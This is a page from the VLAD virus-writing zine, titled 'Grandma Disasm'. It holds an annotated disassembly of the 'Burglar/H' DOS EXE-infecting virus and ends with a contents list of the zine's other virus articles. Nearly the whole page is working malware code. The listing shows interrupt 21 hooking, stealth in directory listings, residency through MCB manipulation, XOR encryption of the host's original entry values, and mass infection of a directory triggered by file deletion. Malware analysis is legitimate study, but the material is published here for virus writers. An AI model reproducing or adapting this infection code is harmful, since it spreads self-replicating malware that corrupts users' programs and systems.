Virus Labs & Distribution
VLAD AF - Grandma Disasm

; "Burglar/H" disassembly by Quantum / VLAD
; I had this virus handed to me by a good friend who found it on some
; warez he had downloaded.  None of the virus scanners he had would
; detect it so he made me a sample and asked if I would do a disassembly
; of it.  So here it is.  I scanned it with tbscan and it gave me a
; dumptruck full of flags but couldn't put a name to it.  AVP pro didn't
; detect anything.
; It's an Exe only infector.  It will not infect files smaller than 256 bytes
; or bigger than 393216 bytes, files with internal overlays (file size !=
; image size + header size), an NE header, or with the letter "V" or "S" in
; its filename. It can infect files that are read only.  It has FCB find
; first/next (dir) stealth and goes resident by minipulating the host's MCB.
; After hooking int 21, it infects on Execute, Open, Attribute Change, and
; Extended Open.
; If an infection is made it will get the system time and if the minutes field
; is 14 it will display its name on the top left corner of the text mode
; screen.  On deletion of a file or check of free file space it infects all the
; Exe's in the current directory that are read only/system/hidden/archive and
; over 1000 bytes.
; Apart from the many millions of nops and wasted space, it is a pretty good
; virus.
; Note: I have no idea whether this virus is called "Burglar" and the person
; who wrote it uses the nick "H" or whether it is actually called "Burglar/H".
; Could whoever coded this virus contact me via email at

; virus entrypoint
 0005 E95A03        jmp     0362               ; jump to install code
 0008 90            nop

; dir stealth
 0023 2EFF1EA700    call    far cs:[00a7h]     ; call int 21
 0028 9C            pushf
 0029 3CFF          cmp     al,0ffh            ; error ?
 002B 742C          jz      0059
 002D 90            nop
 002E 50            push    ax                 ; save regs
 002F 56            push    si
 0030 1E            push    ds
 0031 2E8B362F05    mov     si,cs:[052fh]      ; get dta
 0036 2E8E1E3105    mov     ds,cs:[0531h]
 003B 803CFF        cmp     byte ptr [si],0ffh ; extended fcb ?
 003E 7503          jnz     0043
 0040 83C607        add     si,7               ; add 7 if so
 0043 8A4417        mov     al,[si+17h]        ; time field
 0046 241D          and     al,1dh
 0048 3C1D          cmp     al,1dh             ; 58 or 62 seconds ?
 004A 750A          jnz     0056
 004C 90            nop
 004D 816C1D7E04    sub     word ptr [si+1dh],047eh  ; sub virus size
 0052 835C1F00      sbb     word ptr [si+1fh],0
 0056 1F            pop     ds                 ; restore regs
 0057 5E            pop     si
 0058 58            pop     ax
 0059 9D            popf                       ; outty
 005A CA0200        retf    0002

; Int 21 Entry Point
 005D 2EC606330500  mov     byte ptr cs:[0533h],00     ; clear some flag
 0063 9C            pushf
 0064 3D78F0        cmp     ax,0f078h          ; service check ?
 0067 90            nop
 0068 7506          jnz     0070
 006A 33C0          xor     ax,ax              ; clear ax
 006C 9D            popf
 006D CF            iret                       ; and return
 006E 90            nop
 006F 90            nop
 0070 90            nop
 0071 80FC11        cmp     ah,11h             ; fcb findfirst
 0074 74AD          jz      0023
 0076 80FC12        cmp     ah,12h             ; fcb findnext
 0079 74A8          jz      0023
 007B 80FC3D        cmp     ah,3dh             ; open file
 007E 7442          jz      00C2
 0080 80FC43        cmp     ah,43h             ; change attribute
 0083 743D          jz      00C2
 0085 80FC13        cmp     ah,13h             ; delete file
 0088 7432          jz      00BC
 008A 80FC36        cmp     ah,36h             ; get free disk space
 008D 742D          jz      00BC
 008F 80FC4B        cmp     ah,4bh             ; execution
 0092 90            nop
 0093 90            nop
 0094 742C          jz      00C2
 0096 80FC6C        cmp     ah,6ch             ; extended file open
 0099 7427          jz      00C2
 009B 80FC1A        cmp     ah,1ah             ; set dta
 009E 750A          jnz     00AA
 00A0 2E89162F05    mov     cs:[052fh],dx      ; save new dta
 00A5 2E8C1E3105    mov     cs:[0531h],ds
 00AA 9D            popf
 00AB EAA004EAE3    jmp     E3EA:04A0          ; return to org int 21
 00B0 90            nop
 00B1 90            nop
 00B2 86E0          xchg    ah,al
 00B4 90            nop
 00B5 9C            pushf
 00B6 2EFF1EA700    call    far cs:[00a7h]     ; call old int 21
 00BB C3            ret

; Get Free Disk Space, Delete File
 00BC 2EC6067E0401  mov     byte ptr cs:[047eh],01     ; set some flag

; Open, Change Attrib, Execute, Ext. Open
 00C2 90            nop
 00C3 50            push    ax                 ; save all the regs
 00C4 53            push    bx
 00C5 51            push    cx
 00C6 52            push    dx
 00C7 1E            push    ds
 00C8 06            push    es
 00C9 56            push    si
 00CA 57            push    di
 00CB 80FC6C        cmp     ah,6ch             ; extended open ?
 00CE 7502          jnz     00D2
 00D0 8BD6          mov     dx,si              ; ds:si = file on ext
 00D2 2E803E7E0401  cmp     byte ptr cs:[047eh],01     ; is that flag set ?
 00D8 7406          jz      00E0
 00DA E87900        call    0156               ; infect file in ds:dx
 00DD EB5C          jmp     013B
 00DF 90            nop

;if that flag is set (on delete and get space free)
 00E0 0E            push    CS
 00E1 1F            pop     ds
 00E2 C606340500    mov     byte ptr [0534h],00; clear error
 00E7 B02F          mov     al,2fh
 00E9 E8C6FF        call    00b2h              ; get dta
 00EC 06            push    es
 00ED 53            push    bx
 00EE B01A          mov     al,1ah
 00F0 BAE504        mov     dx,04e5h
 00F3 E8BCFF        call    00B2               ; set dta
 00F6 B04E          mov     al,4eh
 00F8 B92700        mov     cx,0027h   ; read only/system/hidden/archive
 00FB BA2704        mov     dx,0427h           ; "*.*"
 00FE E8B1FF        call    00B2               ; find first file
 0101 7230          jb      0133
 0103 A0FB04        mov     al,[04fbh]         ; file time
 0106 241D          and     al,1dh
 0108 3C1D          cmp     al,1dh             ; seconds = 58 or 62
 010A 7423          jz      012F
 010C 833E010500    cmp     word ptr [0501h],+00   ; higher of filesize = 0
 0111 7508          jnz     011B
 0113 813EFF04E803  cmp     word ptr [04ffh],03E8  ; lower of filesize >= 3e8h
 0119 7214          jb      012F
 011B C70625050305  mov     word ptr [0525h],0503
 0121 BA0305        mov     dx,0503h           ; file name in dta
 0124 E82F00        call    0156               ; infect file at ds:dx
 0127 2E803E340503  cmp     byte ptr cs:[0534h],03    ; error 3 ?
 012D 7404          jz      0133
 012F B04F          mov     al,4fh             ; next file
 0131 EBCB          jmp     00FE
 0133 5A            pop     dx
 0134 1F            pop     ds
 0135 9C            pushf
 0136 B41A          mov     ah,1ah             ; set dta back
 0138 CD21          int     21
 013A 9D            popf
 013B 5F            pop     di
 013C 5E            pop     si
 013D 07            pop     es
 013E 1F            pop     ds
 013F 5A            pop     dx                 ; restore regs
 0140 59            pop     cx
 0141 5B            pop     bx
 0142 58            pop     ax
 0143 2EC6067E0400  mov     byte ptr cs:[047eh],00    ; clear that flag
 0149 2E803E330501  cmp     byte ptr cs:[0533h],01
 014F 7502          jnz     0153
 0151 33DB          xor     bx,bx
 0153 E954FF        jmp     00AA               ; return to org int 21

; check if file is suitable and if so infect it
 0156 8BF2          mov     si,dx
 0158 89162505      mov     cs:[0525h],dx             ; save dx
 015D 90            nop
 015E AC            lodsb                      ; get byte of filename
 015F 0AC0          or      al,al              ; zero ?
 0161 740F          jz      0172
 0163 3C5C          cmp     al,5ch             ; "\" ?
 0165 7404          jz      016B
 0167 3C3A          cmp     al,3ah             ; ":" ?
 0169 75F3          jnz     015E
 016B 2E89362505    mov     cs:[0525h],si      ; dx = after \ or :
 0170 EBEC          jmp     015E
 0172 80FC4B        cmp     ah,4bh             ; executing ?
 0175 90            nop
 0176 740F          jz      0187
 0178 817CFB2E45    cmp     word ptr [si-5],452eh ; Exe ?
 017D 7507          jnz     0186
 017F 817CFD5845    cmp     word ptr [si-3],4558h
 0184 7401          jz      0187
 0186 C3            ret                        ; nope, get out
 0187 0E            push    cs
 0188 07            pop     es
 0189 2E8B362505    mov     si,cs:[0525h]      ; filename (no path)
 018E BF0E04        mov     di,040eh           ; invalid startings
 0191 AD            lodsw                      ; get first 2 letters
 0192 B90700        mov     cx,7               ; 7 invalid startings
 0195 F2AF          repnz scasw                ; is it one of em ?
 0197 7417          jz      01B0               ; yer.. get out
 0199 2E8B362505    mov     si,cs:[0525h]      ; filename (no path)
 019E AC            lodsb                      ; get char from filename
 019F 3C00          cmp     al,0               ; zero ?
 01A1 740A          jz      01AD
 01A3 3C56          cmp     al,56h             ; "V" ?
 01A5 7409          jz      01B0
 01A7 3C53          cmp     al,53h             ; "S" ?
 01A9 7405          jz      01B0
 01AB EBF1          jmp     019E
 01AD E80100        call    01B1               ; infect the file
 01B0 C3            ret

; infect file in ds:dx
 01B1 8CDB          mov     bx,ds              ; bx = segment of filename
 01B3 33C0          xor     ax,ax
 01B5 8ED8          mov     ds,ax              ; int table
 01B7 FF369000      push    [90h]              ; save int 24
 01BB FF369200      push    [92h]
 01BF C70690002B04  mov     word ptr [90h],042bh; set int 24 to null handler
 01C5 8C0E9200      mov     [92h],cs
 01C9 8EDB          mov     ds,bx              ; restore segment of filename
 01CB B84300        mov     ax,43h
 01CE E8E1FE        call    00B2               ; get attribute
 01D1 1E            push    ds
 01D2 52            push    dx
 01D3 51            push    cx                 ; save attributes
 01D4 33C9          xor     cx,cx              ; clear attributes
 01D6 B84301        mov     ax,0143h
 01D9 E8D6FE        call    00B2               ; set attribute
 01DC 7308          jnb     01E6               ; error ?
 01DE 2EFE063405    inc     byte ptr cs:[0534h]; yes, inc error
 01E3 EB65          jmp     024A               ; get out
 01E5 90            nop
 01E6 B83D02        mov     ax,023dh
 01E9 E8C6FE        call    00B2               ; open read/write
 01EC 7309          jnb     01F7               ; error ?
 01EE 2EFE063405    inc     byte ptr cs:[0534h]; yes, inc error
 01F3 EB55          jmp     024A               ; get out
 01F5 90            nop
 01F6 90            nop
 01F7 93            xchg    bx,ax              ; file handle in bx
 01F8 B85700        mov     ax,57h             ; get file time
 01FB E8B4FE        call    00B2
 01FE 2E890E2905    mov     cs:[0529h],cx      ; save file time
 0203 52            push    dx                 ; save file date
 0204 90            nop
 0205 0E            push    cs                 ; cs=ds=es
 0206 1F            pop     ds
 0207 0E            push    cs
 0208 07            pop     es
 0209 B03F          mov     al,3fh
 020B BA7F04        mov     dx,047fh
 020E B96600        mov     cx,66h
 0211 E89EFE        call    00B2               ; read 66h bytes
 0214 A17F04        mov     ax,[047fh]         ; get first 2 bytes
 0217 90            nop
 0218 3D5A4D        cmp     ax,4d5ah           ; ZM ?
 021B 90            nop
 021C 7409          jz      0227
 021E 3D4D5A        cmp     ax,5a4dh           ; MZ ?
 0221 90            nop
 0222 7403          jz      0227
 0224 EB14          jmp     023A               ; nope, we outty
 0226 90            nop
 0227 A09304        mov     al,[0493h]         ; get IP
 022A 3478          xor     al,78h             ; xor with 78
 022C 38069104      cmp     [0491h],al         ; same as checksum ?
 0230 7408          jz      023A               ; yes, file already infected
 0232 EB2E          jmp     0262
 0234 90            nop
 0235 830E29051D    or      word ptr [0529h],+1dh   ; infection marker
 023A 5A            pop     dx                 ; restore date
 023B 8B0E2905      mov     cx,[0529h]         ; restore time
 023F B85701        mov     ax,0157h
 0242 E86DFE        call    00B2               ; set date/time
 0245 B03E          mov     al,3eh
 0247 E868FE        call    00B2               ; close file
 024A B84301        mov     ax,0143h
 024D 59            pop     cx                 ; restore attribs
 024E 5A            pop     dx                 ; restore filename
 024F 1F            pop     ds
 0250 E85FFE        call    00B2               ; set attributes
 0253 33C0          xor     ax,ax
 0255 8ED8          mov     ds,ax              ; int table
 0257 8F069200      pop     [92h]              ; restore int 24
 025B 8F069000      pop     [90h]
 025F 0E            push    cs                 ; ds=cs
 0260 1F            pop     ds
 0261 C3            ret
 0262 BE7F04        mov     si,047fh           ; si = start of MZ header
 0265 90            nop
 0266 C70627050000  mov     word ptr [0527h],0000  ; clear something
 026C 8B543C        mov     dx,[si+3ch]
 026F 8B4C3E        mov     cx,[si+3eh]
 0272 B80042        mov     ax,4200h
 0275 CD21          int     21      ; goto secondary header offset
 0277 B90200        mov     cx,2
 027A BA2705        mov     dx,0527h
 027D B43F          mov     ah,3fh
 027F CD21          int     21                 ; read in 2 bytes
 0281 813E27054E45  cmp     word ptr [0527h],454eh  ; "NE" ?
 0287 7502          jnz     028B
 0289 EBAF          jmp     023A
 028B B002          mov     al,2
 028D E8C900        call    0359               ; goto end of file
 0290 83FA06        cmp     dx,6
 0293 77A5          JA      023A               ; is file too big ?
 0295 0BD2          or      dx,dx
 0297 7507          jnz     02A0               ; file > 65535 bytes ?
 0299 3D0001        cmp     ax,0100h
 029C 7702          JA      02A0               ; file > 256 bytes ?
 029E EB9A          jmp     023A               ; no, get outty
 02A0 52            push    dx                 ; save the file size
 02A1 50            push    ax
 02A2 8B4404        mov     ax,[si+4]          ; size of image / 512
 02A5 8B7C02        mov     di,[si+2]          ; size of image % 512
 02A8 0BFF          or      di,di
 02AA 7401          jz      02AD               ; even div by 512 ?
 02AC 48            dec     ax                 ; no, dec num 512 paras
 02AD B90002        mov     cx,0200h
 02B0 F7E1          mul     cx                 ; mul by 512
 02B2 03C7          add     ax,di
 02B4 83D200        adc     dx,0               ; dx:ax = image size
 02B7 5F            pop     di
 02B8 3BF8          cmp     di,ax
 02BA 5F            pop     di
 02BB 75E1          jnz     029E               ; are there overlays ?
 02BD 3BFA          cmp     di,dx
 02BF 75DD          jnz     029E
 02C1 50            push    ax                 ; save filesize
 02C2 52            push    dx
 02C3 56            push    si
 02C4 BE8D04        mov     si,048dh
 02C7 BF0304        mov     di,0403h
 02CA B90A00        mov     cx,0ah
 02CD F3A4          rep movsb                  ; save org cs:ip and ss:sp
 02CF 5E            pop     si
 02D0 33FF          xor     di,di
 02D2 E81D01        call    03F2               ; encrypt that org values
 02D5 B91000        mov     cx,10h
 02D8 F7F1          div     cx                 ; div size by 16
 02DA 2B4408        sub     ax,[si+8]          ; sub size of header
 02DD 894416        mov     [si+16h],ax        ; store new cs
 02E0 89166003      mov     [0360h],dx         ; self modify delta offset
 02E4 895414        mov     [si+14h],dx        ; store new ip
 02E7 81C27E04      add     dx,047eh           ; add virus size
 02EB 895410        mov     [si+10h],dx        ; setup stack pointer
 02EE 89440E        mov     [si+0Eh],ax
 02F1 5A            pop     dx                 ; restore file size
 02F2 58            pop     ax
 02F3 057E04        add     ax,047eh           ; add virus size
 02F6 83D200        adc     dx,0
 02F9 B90002        mov     cx,0200h
 02FC F7F1          div     cx                 ; div by 512
 02FE 0BD2          or      dx,dx
 0300 7401          jz      0303               ; no remiander ?
 0302 40            inc     ax                 ; inc number of 512 paras
 0303 894404        mov     [si+4],ax          ; store image size
 0306 895402        mov     [si+2],dx
 0309 8A4414        mov     al,[si+14h]
 030C 3478          xor     al,78h
 030E 884412        mov     [si+12h],al        ; add infection check
 0311 33D2          xor     dx,dx
 0313 B97E04        mov     cx,047eh
 0316 B440          mov     ah,40h
 0318 CD21          int     21                 ; write virus to file
 031A C606340503    mov     byte ptr [0534h],3 ; set error to 3
 031F B000          mov     al,0
 0321 E83500        call    0359               ; back to start of file
 0324 BA7F04        mov     dx,047fh
 0327 B91800        mov     cx,18h
 032A B440          mov     ah,40h
 032C CD21          int     21                 ; write MZ header
 032E B42C          mov     ah,2ch
 0330 CD21          int     21                 ; get time
 0332 80F90E        cmp     cl,0Eh             ; minutes = 14 ?
 0335 751F          jnz     0356
 0337 BE1E04        mov     si,041eh
 033A B800B8        mov     ax,0B800h
 033D 8ED8          mov     ds,ax              ; text video segment
 033F 33FF          xor     di,di              ; at the top
 0341 B90900        mov     cx,9               ; 9 chars
 0344 2E            cs:
 0345 8A04          mov     al,[si]            ; load a char
 0347 46            inc     si
 0348 8805          mov     [di],al            ; store in mem
 034A 47            inc     di
 034B C6058F        mov     byte ptr [di],8fh  ; store some colour
 034E 47            inc     di
 034F E2F3          loop    0344               ; char out loop
 0351 B97777        mov     cx,7777h
 0354 E2FE          loop    0354               ; delay a few ms'
 0356 E9DCFE        jmp     0235
 0359 33C9          xor     cx,cx
 035B 33D2          xor     dx,dx
 035D B442          mov     ah,42h
 035F CD21          int     21                 ; lseek
 0361 C3            ret
 0362 90            nop
 0363 90            nop
 0364 BE0500        mov     si,5               ; delta offset
 0367 8BFE          mov     di,si
 0369 E88600        call    03F2               ; some encryption
 036C 56            push    si                 ; save si
 036D B430          mov     ah,30h             ; ah = 30
 036F 80C448        add     ah,48h             ; ah = 78
 0372 B0F0          mov     al,0f0h            ; ax = 78f0h
 0374 86E0          xchg    ah,al              ; ax = f078h
 0376 CD21          int     21                 ; residency check
 0378 0BC0          or      ax,ax              ; ax = 0 ?
 037A 7451          jz      03CD               ; go to out
 037C BF7777        mov     di,7777h           ; some big value
 037F 90            nop                        ; doesnt do much
 0380 4F            dec     di                 ; does something
 0381 90            nop                        ; doesnt do anything
 0382 90            nop                        ; neither does this
 0383 75FA          jnz     037F               ; do nothing loop
 0385 1E            push    ds                 ; save ds
 0386 8CC3          mov     bx,es              ; bx = psp
 0388 4B            dec     bx                 ; bx = mcb
 0389 8EDB          mov     ds,bx              ; ds = mcb
 038B BB0200        mov     bx,2
 038E 807FFE5A      cmp     byte ptr [bx-2],5A ; check for 'Z' in mcb
 0392 7536          jnz     03CA               ; nope -> get out
 0394 B95600        mov     cx,56h             ; virus size / 16 + 1
 0397 294F01        sub     [bx+1],cx
 039A 294F10        sub     [bx+10h],cx
 039D 8E4710        mov     es,[bx+10h]        ; es = new segment
 03A0 33C0          xor     ax,ax
 03A2 8ED8          mov     ds,ax              ; ds = int table
 03A4 C5878200      lds     ax,[bx+82h]        ; (bx+82)/4 = 21h
 03A8 2E8984A700    mov     cs:[si+0a7h],ax    ; save old address
 03AD 2E8C9CA900    mov     cs:[si+0a9h],ds
 03B2 0E            push    cs
 03B3 1F            pop     ds                 ; ds = cs
 03B4 33FF          xor     di,di
 03B6 B93505        mov     cx,0535h           ; virus size is 535h bytes
 03B9 FC            cld
 03BA F3A4          rep movsb                  ; move virus there
 03BC 8ED9          mov     ds,cx              ; ds = int table
 03BE FA            cli
 03BF 8C878400      mov     [bx+84h],es        ; move new int 21
 03C3 C78782005800  mov     word ptr [bx+82h],58h
 03C9 FB            sti
 03CA 07            pop     es                 ; restore ds into es
 03CB 06            push    es
 03CC 1F            pop     ds                 ; es into ds
 03CD 90            nop
 03CE 5E            pop     si                 ; restore delta offset
 03CF 90            nop
 03D0 8CC3          mov     bx,es              ; bx = psp
 03D2 83C310        add     bx,10h             ; bx = image base
 03D5 2E019C0B04    add     cs:[si+40bh],bx    ; fixup org host
 03DA 2E019C0304    add     cs:[si+403h],bx    ; fixup org stack
 03DF 2E8E940304    mov     ss,cs:[si+403h]    ; set up org stack
 03E4 2E8BA40504    mov     sp,cs:[si+405h]
 03E9 33C0          xor     ax,ax              ; fuxor cmd line
 03EB 33DB          xor     bx,bx              ; fuxor load module memory size
 03ED 2EFFAC0904    jmp     far cs:[si+409h]   ; back to org host

 03F2 50            push    ax                 ; encryption routine
 03F3 81C70304      add     di,403h            ; relocate
 03F7 B90A00        mov     cx,0Ah          ; bytes needed for return to host
 03FA B87677        mov     ax,7776h           ; xor value
 03FD 90            nop
 03FE 2E3105        xor     cs:[di],ax         ; trivial word xor
 0401 47            inc     di
 0402 90            nop
 0403 E2F9          loop    03FE
 0405 58            pop     ax
 0406 C3            ret
 0407 90            nop

; encrypted block
 0408 7701                                     ; org ss
 040A 0100                                     ; org sp
 040C 0101                                     ; checksum
 040E 0101                                     ; org IP
 0410 0101                                     ; org cs
; end encrypted block

 0412 0e7h                                     ; beats me
 0413 db "CLHWTBF-WCTK"           ; Chars that filenames cant start with
 041F 0000
 0421 0000
 0423 db "Burglar/H"                           ; id string
 042C db "*.*",0

; null int 24 handler
 0430 32C0          xor     al,al
 0432 CF            iret

; rest of this looks like wasted space to me
 0433 0000
 0435 0000
 0437 0000
 0439 0000
 043B 0000
 043D 0000
 043F 0000
 0441 0000
 0443 0000
 0445 0000
 0447 0000
 0449 0000
 044B 0000
 044D 0000
 044F 0000
 0451 0000
 0453 0000
 0455 0000
 0457 0000
 0459 0000
 045B 0000
 045D 0000
 045F 0000
 0461 0000
 0463 0000
 0465 0000
 0467 0000
 0469 78F0
 046B 0000
 046D 0E
 046E 0401
 0470 0000
 0472 00970397
 0476 03067000
 047A 0000
 047C 006203
 047F BF2629
 0482 20E1


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus


VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad


ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

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